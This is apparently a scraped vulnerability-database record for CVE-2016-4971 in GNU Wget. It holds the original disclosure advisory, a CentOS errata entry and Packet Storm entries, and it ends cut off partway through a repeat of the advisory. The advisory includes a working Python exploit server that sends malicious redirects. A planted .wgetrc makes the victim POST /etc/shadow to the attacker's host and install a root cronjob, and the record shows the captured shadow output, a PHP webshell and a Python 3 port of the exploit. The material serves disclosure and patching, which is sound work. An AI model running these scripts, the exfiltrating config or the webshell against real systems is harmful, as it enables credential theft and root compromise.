{"id": "1337DAY-ID-25433", "type": "zdt", "bulletinFamily": "exploit", "title": "GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution", "description": "Exploit for linux platform in category remote exploits", "published": "2016-07-06T00:00:00", "modified": "2016-07-06T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/25433", "reporter": "Dawid Golunski", "references": [], "cvelist": ["CVE-2016-4971"], "immutableFields": [], "lastseen": "2018-04-08T23:45:07", "viewCount": 20, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2016-720"]}, {"type": "archlinux", "idList": ["ASA-201606-19"]}, {"type": "centos", "idList": ["CESA-2016:2587"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0566"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:6D0FE27767FA08BC6718743E9AB9EC99"]}, {"type": "cve", "idList": ["CVE-2016-4971"]}, {"type": "debian", "idList": ["DEBIAN:DLA-536-1:51225"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-4971"]}, {"type": "exploitdb", "idList": ["EDB-ID:40064", "EDB-ID:49815"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B7D0421EBA79F420787732ED0D8CDB1D"]}, {"type": "f5", "idList": ["F5:K55181425", "SOL55181425"]}, {"type": "fedora", "idList": ["FEDORA:4D3E16068708", "FEDORA:A52D660A96E6", "FEDORA:EE8A96078F47"]}, {"type": "freebsd", "idList": ["6DF56C60-3738-11E6-A671-60A44CE6887B"]}, {"type": "gentoo", "idList": ["GLSA-201610-11"]}, {"type": "ibm", "idList": ["3212B53427A43325550BE8D76D8414CB80F59E8C098469790D9938A354FC4F5A", "C57CB4EA12FFF65730206B718900EAEB6EFB3AEE18254CB007E3EAD2F81BB99B"]}, {"type": "mageia", "idList": ["MGASA-2016-0323"]}, {"type": "nessus", "idList": ["802003.PRM", "ALA_ALAS-2016-720.NASL", "CENTOS_RHSA-2016-2587.NASL", "DEBIAN_DLA-536.NASL", "EULEROS_SA-2016-1064.NASL", "EULEROS_SA-2019-1417.NASL", "FEDORA_2016-24135DFE43.NASL", "FEDORA_2016-2DB8CBC2FD.NASL", "FEDORA_2016-E14374472F.NASL", "FREEBSD_PKG_6DF56C60373811E6A67160A44CE6887B.NASL", "GENTOO_GLSA-201610-11.NASL", "OPENSUSE-2016-1067.NASL", "OPENSUSE-2016-973.NASL", "ORACLELINUX_ELSA-2016-2587.NASL", "PALO_ALTO_PAN-OS_7_0_15.NASL", "REDHAT-RHSA-2016-2587.NASL", "SLACKWARE_SSA_2016-165-01.NASL", "SL_20161103_WGET_ON_SL7_X.NASL", "SUSE_SU-2016-2226-1.NASL", "SUSE_SU-2016-2358-1.NASL", "UBUNTU_USN-3012-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106827", "OPENVAS:1361412562310120709", "OPENVAS:1361412562310808439", "OPENVAS:1361412562310808447", "OPENVAS:1361412562310808463", "OPENVAS:1361412562310842802", "OPENVAS:1361412562310871702", "OPENVAS:1361412562311220161064", "OPENVAS:1361412562311220191417"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2587"]}, {"type": "osv", "idList": ["OSV:DLA-536-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:137795", "PACKETSTORM:162395"]}, {"type": "paloalto", "idList": ["PAN-SA-2017-0016"]}, {"type": "redhat", "idList": ["RHSA-2016:2587"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-4971"]}, {"type": "slackware", "idList": ["SSA-2016-165-01"]}, {"type": "ubuntu", "idList": ["USN-3012-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-4971"]}, {"type": "zdt", "idList": ["1337DAY-ID-36167"]}]}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2016-720"]}, {"type": "archlinux", "idList": ["ASA-201606-19"]}, {"type": "centos", "idList": ["CESA-2016:2587"]}, {"type": "cve", "idList": ["CVE-2016-4971"]}, {"type": "debian", "idList": ["DEBIAN:DLA-536-1:51225"]}, {"type": "exploitdb", "idList": ["EDB-ID:40064"]}, {"type": "f5", "idList": ["SOL55181425"]}, {"type": "fedora", "idList": ["FEDORA:EE8A96078F47"]}, {"type": "freebsd", "idList": ["6DF56C60-3738-11E6-A671-60A44CE6887B"]}, {"type": "ibm", "idList": ["C57CB4EA12FFF65730206B718900EAEB6EFB3AEE18254CB007E3EAD2F81BB99B"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-720.NASL", "DEBIAN_DLA-536.NASL", "FEDORA_2016-24135DFE43.NASL", "FEDORA_2016-2DB8CBC2FD.NASL", "FEDORA_2016-E14374472F.NASL", "FREEBSD_PKG_6DF56C60373811E6A67160A44CE6887B.NASL", "SLACKWARE_SSA_2016-165-01.NASL", "UBUNTU_USN-3012-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808439"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2587"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162395"]}, {"type": "redhat", "idList": ["RHSA-2016:2587"]}, {"type": "zdt", "idList": ["1337DAY-ID-36167"]}]}, "exploitation": null, "vulnersScore": -0.4}, "sourceHref": "https://0day.today/exploit/25433", "sourceData": "=============================================\r\n- Release date: 06.07.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-4971\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\r\n \r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. \r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n \r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n \r\nhttps://www.gnu.org/software/wget/\r\n \r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \r\ncompromised web server) can be tricked into saving an arbitrary remote file \r\nsupplied by an attacker, with arbitrary contents and filename under \r\nthe current directory and possibly other directories by writing to .wgetrc.\r\nDepending on the context in which wget is used, this can lead to remote code \r\nexecution and even root privilege escalation if wget is run via a root cronjob \r\nas is often the case in many web application deployments. \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n \r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nBecause of lack of sufficient controls in wget, when user downloads a file \r\nwith wget, such as:\r\n \r\nwget http://attackers-server/safe_file.txt\r\n \r\nan attacker who controls the server could make wget create an arbitrary file\r\nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \r\ncontaining FTP server reference in response to the victim's wget request. \r\n \r\nFor example, if the attacker's server replies with the following response:\r\n \r\nHTTP/1.1 302 Found\r\nCache-Control: private\r\nContent-Type: text/html; charset=UTF-8\r\nLocation: ftp://attackers-server/.bash_profile\r\nContent-Length: 262\r\nServer: Apache\r\n \r\nwget will automatically follow the redirect and will download a malicious\r\n.bash_profile file from a malicious FTP server. \r\nIt will fail to rename the file to the originally requested filename of \r\n'safe_file.txt' as it would normally do, in case of a redirect to another \r\nHTTP resource with a different name. \r\n \r\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\r\nwith an arbitrary filename to the victim's current directory.\r\n \r\nExecution flow:\r\n \r\n[email\u00a0protected]:~$ wget --version | head -n1\r\nGNU Wget 1.17 built on linux-gnu.\r\n \r\n[email\u00a0protected]:~$ pwd\r\n/home/victim\r\n \r\n[email\u00a0protected]:~$ ls\r\n[email\u00a0protected]:~$ \r\n \r\n[email\u00a0protected]:~$ wget http://attackers-server/safe-file.txt\r\nResolving attackers-server... 192.168.57.1\r\nConnecting to attackers-server|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 302 Found\r\nLocation: ftp://192.168.57.1/.bash_profile [following]\r\n => \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122\r\nConnecting to 192.168.57.1:21... connected.\r\nLogging in as anonymous ... Logged in!\r\n==> SYST ... done. ==> PWD ... done.\r\n==> TYPE I ... done. ==> CWD not needed.\r\n==> SIZE .bash_profile ... 55\r\n==> PASV ... done. ==> RETR .bash_profile ... done.\r\nLength: 55 (unauthoritative)\r\n \r\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\r\n \r\n2016-02-19 04:50:37 (1.27 MB/s) - \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 saved [55]\r\n \r\n \r\n[email\u00a0protected]:~$ ls -l\r\ntotal 4\r\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\r\n[email\u00a0protected]:~$ \r\n \r\n \r\nThis vulnerability will not work if extra options that force destination\r\nfilename are specified as a paramter. Such as: -O /tmp/output\r\nIt is however possible to exploit the issue with mirroring/recursive options\r\nenabled such as -r or -m.\r\n \r\nAnother limitation is that attacker exploiting this vulnerability can only\r\nupload his malicious file to the current directory from which wget was run, \r\nor to a directory specified by -P option (directory_prefix option).\r\nThis could however be enough to exploit wget run from home directory, or\r\nwithin web document root (in which case attacker could write malicious php files\r\nor .bash_profile files).\r\n \r\nThe current directory limitation could also be bypassed by uploading a .wgetrc \r\nconfig file if wget was run from a home directory.\r\n \r\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\r\nsettings such as destination directory for all downloaded files in future,\r\nas well as set a proxy setting to make future requests go through a malicious \r\nproxy server belonging to the attackers to which they could send further \r\nmalicious responses.\r\n \r\n \r\nHere is a set of Wget settings that can be helpful to an attacker:\r\n \r\ndir_prefix = string\r\n Top of directory tree\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-P string\u00e2\u20ac\u2122.\r\n \r\npost_file = file\r\n Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u00e2\u20ac\u02dc--post-file=file\u00e2\u20ac\u2122.\r\n \r\nrecursive = on/off\r\n Recursive on/off\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-r\u00e2\u20ac\u2122.\r\n \r\ntimestamping = on/off\r\n Allows to overwrite existing files.\r\n \r\ncut_dirs = n\r\n Ignore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).\r\n \r\nhttp_proxy \r\n HTTP Proxy server\r\n \r\nhttps_proxy \r\n HTTPS Proxy server\r\n \r\noutput_document = file\r\n Set the output filename\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-O file\u00e2\u20ac\u2122.\r\n \r\ninput = file\r\n Read the URLs from string, like \u00e2\u20ac\u02dc-i file\u00e2\u20ac\u2122.\r\n \r\nmetalink-over-http\r\n Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \r\n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\r\n \r\n \r\n \r\nFull list of .wgetrc options can be found in:\r\n \r\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\r\n \r\n \r\n \r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n \r\n \r\n1) Cronjob with wget scenario\r\n \r\nOften wget is used inside cronjobs. By default cronjobs run within home \r\ndirectory of the cronjob owner.\r\nSuch wget cronjobs are commonly used with many applications used to download \r\nnew version of databases, requesting web scripts that perform scheduled tasks \r\nsuch as rebuilding indexes, cleaning caches etc. \r\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \r\nthe Internet with exploitable wget cronjobs:\r\n \r\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\r\nhttps://docs.moodle.org/2x/ca/Cron\r\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\r\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\r\n \r\nSuch setup could be abused by attackers to upload .bash_profile file through\r\nwget vulnerability and run commands in the context of the victim user upon \r\ntheir next log-in. \r\n \r\nAs cron runs priodically attackers, could also write out .wgetrc file in the \r\nfirst response and then write to /etc/cron.d/malicious-cron in the second. \r\nIf a cronjob is run by root, this would give them an almost instant root code \r\nexecution.\r\n \r\n \r\nIt is worth noting that if an attacker had access to local network they could \r\npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \r\nresponses to wget requests.\r\n \r\nThis issue could also be exploited by attackers who have already gained \r\naccess to the server through a web vulnerability to escalate their privileges. \r\nIn many cases the cron jobs (as in examples above) are set up to request \r\nvarious web scripts e.g: \r\nhttp://localhost/clean-cache.php \r\n \r\nIf the file was writable by apache, and attacker had access to www-data/apache \r\naccount, they could modify it to return malicious Location header and exploit \r\nroot cronjob that runs the wget request in order to escalate their privileges \r\nto root.\r\n \r\n \r\nFor simplicity we can assume that attacker already has control over the server \r\nthat the victim sends the request to with wget.\r\n \r\nThe root cronjob on the victim server may look as follows:\r\n \r\n[email\u00a0protected]:~# cat /etc/cron.d/update-database\r\n# Update database file every 2 minutes\r\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\r\n \r\n \r\nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \r\nand starts an FTP server:\r\n \r\nattackers-server# mkdir /tmp/ftptest\r\nattackers-server# cd /tmp/ftptest\r\n \r\nattackers-server# cat <<_EOF_>.wgetrc\r\npost_file = /etc/shadow\r\noutput_document = /etc/cron.d/wget-root-shell\r\n_EOF_\r\n \r\nattackers-server# sudo pip install pyftpdlib\r\nattackers-server# python -m pyftpdlib -p21 -w\r\n \r\n \r\nAt this point attacker can start an HTTP server which will exploit wget by\r\nsending malicious redirects to the victim wget's requests:\r\n \r\n---[ wget-exploit.py ]---\r\n \r\n#!/usr/bin/env python\r\n \r\n#\r\n# Wget 1.18 < Arbitrary File Upload Exploit\r\n# Dawid Golunski\r\n# dawid( at )legalhackers.com\r\n#\r\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n#\r\n# CVE-2016-4971 \r\n#\r\n \r\nimport SimpleHTTPServer\r\nimport SocketServer\r\nimport socket;\r\n \r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_GET(self):\r\n # This takes care of sending .wgetrc\r\n \r\n print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n \r\n print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\r\n self.send_response(301)\r\n new_path = '%s'%('ftp://[email\u00a0protected]%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\r\n print \"Sending redirect to %s \\n\"%(new_path)\r\n self.send_header('Location', new_path)\r\n self.end_headers()\r\n \r\n def do_POST(self):\r\n # In here we will receive extracted file and install a PoC cronjob\r\n \r\n print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n \r\n content_len = int(self.headers.getheader('content-length', 0))\r\n post_body = self.rfile.read(content_len)\r\n print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\r\n \r\n print \"Sending back a cronjob script as a thank-you for the file...\" \r\n print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/plain')\r\n self.end_headers()\r\n self.wfile.write(ROOT_CRON)\r\n \r\n print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\r\n \r\n return\r\n \r\nHTTP_LISTEN_IP = '192.168.57.1'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.57.1'\r\nFTP_PORT = 21\r\n \r\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\r\n \r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n \r\nprint \"Ready? Is your FTP server running?\"\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n print \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)\r\nelse:\r\n print \"FTP is down :( Exiting.\"\r\n exit(1)\r\n \r\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\r\n \r\nhandler.serve_forever()\r\n \r\n \r\n---[ eof ]---\r\n \r\n \r\n \r\nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes\r\nthe aforementioned cronjob with wget.\r\n \r\nThe output should look similar to:\r\n \r\n \r\n---[ wget-exploit.py output ]---\r\n \r\nattackers-server# python ./wget-exploit.py \r\n \r\nReady? Is your FTP server running?\r\nFTP found open on 192.168.57.1:21. Let's go then\r\n \r\nServing wget exploit on port 80...\r\n \r\n \r\nWe have a volunteer requesting /database.db by GET :)\r\n \r\nUploading .wgetrc via ftp redirect vuln. It should land in /root \r\n \r\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\r\nSending redirect to ftp://[email\u00a0protected]:21/.wgetrc \r\n \r\nWe have a volunteer requesting /database.db by POST :)\r\n \r\nReceived POST from wget, this should be the extracted /etc/shadow file: \r\n \r\n---[begin]---\r\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\r\ndaemon:*:16484:0:99999:7:::\r\nbin:*:16484:0:99999:7:::\r\nsys:*:16484:0:99999:7:::\r\nsync:*:16484:0:99999:7:::\r\ngames:*:16484:0:99999:7:::\r\nman:*:16484:0:99999:7:::\r\nlp:*:16484:0:99999:7:::\r\n...cut...\r\n---[eof]---\r\n \r\nSending back a cronjob script as a thank-you for the file...\r\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\r\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\r\n \r\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \r\n \r\n---[ output eof ]---\r\n \r\n \r\nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file\r\nsetting to /etc/shadow.\r\nTherefore, on the next wget run, wget sent back shadow file to the attacker.\r\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \r\ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \r\nserver:\r\n \r\n \r\n[email\u00a0protected]:~# cat /etc/cron.d/wget-root-shell \r\n* * * * * root /usr/bin/id > /root/hacked-via-wget \r\n \r\n[email\u00a0protected]:~# cat /root/hacked-via-wget \r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\n \r\n2) PHP web application scenario\r\n \r\nIf wget is used within a PHP script e.g.:\r\n \r\n<?php\r\n \r\n// Update geoip data\r\n \r\n system(\"wget -N -P geoip http://attackers-host/goeip.db\"); \r\n \r\n?>\r\n \r\nAn attacker who manages to respond to the request could simply upload a PHP\r\nbackdoor of:\r\n \r\n<?php\r\n //webshell.php\r\n \r\n system($_GET['cmd']);\r\n?>\r\n \r\nby using the wget-exploit script described in example 1.\r\n \r\nAfter the upload he could simply execute the script and their shell\r\ncommand by a GET request to:\r\n \r\nhttp://victims-php-host/geoip/webshell.php?cmd=id\r\n \r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nAffected versions of wget that connect to untrusted (or compromised) web \r\nservers could be tricked into uploading a file under an arbitrary name, or\r\neven path (if wget is run from a home directory).\r\nDepending on the context in which wget is used, this could lead to\r\nuploading a web shell and granting the attacker access remote access to the\r\nsystem, or privilege escalation. It could be possible for attackers to escalate\r\nto root user if wget is run via root cronjob as it is often the case in web \r\napplication deployments and is recommended in some guides on the Internet.\r\n \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe networ who are able to intercept/modify the network traffic.\r\n \r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nAll versions of Wget before the patched version of 1.18 are affected.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nUpdate to wget version 1.18 as advertised by the vendor at:\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nLinux distributions should update their wget packages. It is recommended\r\nto update wget manually if an updated package is not available for your\r\ndistribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttp://legalhackers.com\r\n \r\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nhttp://www.ubuntu.com/usn/usn-3012-1/\r\n \r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\r\n \r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\r\n \r\nX. CREDITS\r\n-------------------------\r\n \r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n \r\n06.07.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n \r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\n\n# 0day.today [2018-04-08] #", "_state": {"dependencies": 1659994789, "score": 1659995775}, "_internal": {"score_hash": "1365528452d12a78f70d6d561698aae3"}}
{"centos": [{"lastseen": "2023-01-01T05:08:49", "description": "**CentOS Errata and Security Advisory** CESA-2016:2587\n\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue. Upstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-cr-announce/2016-November/023137.html\n\n**Affected packages:**\nwget\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2016:2587", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-25T15:51:17", "type": "centos", "title": "wget security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-11-25T15:51:17", "id": "CESA-2016:2587", "href": "https://lists.centos.org/pipermail/centos-cr-announce/2016-November/023137.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-04-30T15:31:03", "description": "", "cvss3": {}, "published": "2021-04-30T00:00:00", "type": "packetstorm", "title": "GNU wget Arbitrary File Upload / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-04-30T00:00:00", "id": "PACKETSTORM:162395", "href": "https://packetstormsecurity.com/files/162395/GNU-wget-Arbitrary-File-Upload-Code-Execution.html", "sourceData": "`# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) \n# Original Exploit Author: Dawid Golunski \n# Exploit Author: liewehacksie \n# Version: GNU Wget < 1.18 \n# CVE: CVE-2016-4971 \n \nimport http.server \nimport socketserver \nimport socket \nimport sys \n \nclass wgetExploit(http.server.SimpleHTTPRequestHandler): \n \ndef do_GET(self): \n# This takes care of sending .wgetrc/.bash_profile/$file \n \nprint(\"We have a volunteer requesting \" + self.path + \" by GET :)\\n\") \nif \"Wget\" not in self.headers.get('User-Agent'): \nprint(\"But it's not a Wget :( \\n\") \nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \nself.send_response(301) \nprint(\"Uploading \" + str(FILE) + \"via ftp redirect vuln. It should land in /home/ \\n\") \nnew_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE) \n \nprint(\"Sending redirect to %s \\n\"%(new_path)) \nself.send_header('Location', new_path) \nself.end_headers() \n \n \nHTTP_LISTEN_IP = '192.168.72.2' \nHTTP_LISTEN_PORT = 80 \nFTP_HOST = '192.168.72.4' \nFTP_PORT = 2121 \nFILE = '.bash_profile' \n \nhandler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) \n \nprint(\"Ready? Is your FTP server running?\") \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nresult = sock.connect_ex((FTP_HOST, FTP_PORT)) \nif result == 0: \nprint(\"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)) \nelse: \nprint(\"FTP is down :( Exiting.\") \nexit(1) \n \nprint(\"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT) \n \nhandler.serve_forever() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162395/wget-uploadexec.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2016-12-05T22:21:23", "description": "", "cvss3": {}, "published": "2016-07-06T00:00:00", "type": "packetstorm", "title": "GNU Wget Arbitrary File Upload / Potential Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-06T00:00:00", "id": "PACKETSTORM:137795", "href": "https://packetstormsecurity.com/files/137795/GNU-Wget-Arbitrary-File-Upload-Potential-Remote-Code-Execution.html", "sourceData": "`============================================= \n- Release date: 06.07.2016 \n- Discovered by: Dawid Golunski \n- Severity: High \n- CVE-2016-4971 \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nGNU Wget < 1.18 Arbitrary File Upload / Potential RCE \n \n \nII. BACKGROUND \n------------------------- \n \n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \nFTP, the most widely-used Internet protocols. \nIt is a non-interactive commandline tool, so it may easily be called from \nscripts, cron jobs, terminals without X-Windows support, etc. \n \nGNU Wget has many features to make retrieving large files or mirroring entire \nweb or FTP sites easy \n\" \n \nhttps://www.gnu.org/software/wget/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \ncompromised web server) can be tricked into saving an arbitrary remote file \nsupplied by an attacker, with arbitrary contents and filename under \nthe current directory and possibly other directories by writing to .wgetrc. \nDepending on the context in which wget is used, this can lead to remote code \nexecution and even root privilege escalation if wget is run via a root cronjob \nas is often the case in many web application deployments. \nThe vulnerability could also be exploited by well-positioned attackers within \nthe network who are able to intercept/modify the network traffic. \n \n \nIV. DESCRIPTION \n------------------------- \n \nBecause of lack of sufficient controls in wget, when user downloads a file \nwith wget, such as: \n \nwget http://attackers-server/safe_file.txt \n \nan attacker who controls the server could make wget create an arbitrary file \nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \ncontaining FTP server reference in response to the victim's wget request. \n \nFor example, if the attacker's server replies with the following response: \n \nHTTP/1.1 302 Found \nCache-Control: private \nContent-Type: text/html; charset=UTF-8 \nLocation: ftp://attackers-server/.bash_profile \nContent-Length: 262 \nServer: Apache \n \nwget will automatically follow the redirect and will download a malicious \n.bash_profile file from a malicious FTP server. \nIt will fail to rename the file to the originally requested filename of \n'safe_file.txt' as it would normally do, in case of a redirect to another \nHTTP resource with a different name. \n \nBecause of this vulnerability, an attacker is able to upload an arbitrary file \nwith an arbitrary filename to the victim's current directory. \n \nExecution flow: \n \nvictim@trusty:~$ wget --version | head -n1 \nGNU Wget 1.17 built on linux-gnu. \n \nvictim@trusty:~$ pwd \n/home/victim \n \nvictim@trusty:~$ ls \nvictim@trusty:~$ \n \nvictim@trusty:~$ wget http://attackers-server/safe-file.txt \nResolving attackers-server... 192.168.57.1 \nConnecting to attackers-server|192.168.57.1|:80... connected. \nHTTP request sent, awaiting response... 302 Found \nLocation: 